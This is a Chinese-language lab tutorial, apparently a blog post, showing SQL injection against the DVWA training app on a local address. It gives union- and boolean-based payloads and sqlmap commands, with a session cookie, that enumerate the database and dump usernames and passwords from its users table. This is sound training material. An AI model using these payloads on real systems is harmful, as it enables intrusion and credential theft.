1、渗透之利用sqlmap对dvwa进行sql注入

本文详细介绍了在dvwa平台上进行SQL注入攻击的过程,包括寻找注入点、使用sqlmap工具进行测试、获取数据库信息、展示所有表及列的具体值等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

测试环境:dvwa+Kail

1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/

1.2、注入点初步测试: 1' union select user, password from users#

1.3、继续测试:1'or'1'='1

2、使用Kail工具测试:

sqlmap -u http://192.168.43.75/dvwa/vulnerabilities/sqli/?id=1

可以看出需要登录,加上cookie:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6" --batch

成功!可看到服务器配置信息,继续拿数据库信息:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6" --dbs

查看某数据库并展示所有表:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch -D dvwa --tables

查看某数据库某表的所有列:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch  -D dvwa -T users --columns

查询数据:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch -D dvwa -T users -C password,users --dump

查不到需要信息,修改sqlmap参数:

sqlmap -u "http://192.168.43.75:80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vp85jg4o3lb509u7ajuecefpd6"  --batch  --dump -C "user_id,user,password" -T "users" -D "dvwa"
 # --dump -C " " -T " " -D " "参数得到---dvwa数据库---下面的---表users---下面的列(Columns)的具体值,即某(些)属性的具体值

完成!

 

参考文章:

DVWA演练平台之SQL注入(全新认识)

SQL注入-注入点判断

SQLmap注入学习实战 —— dvwa 从low到impossble

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值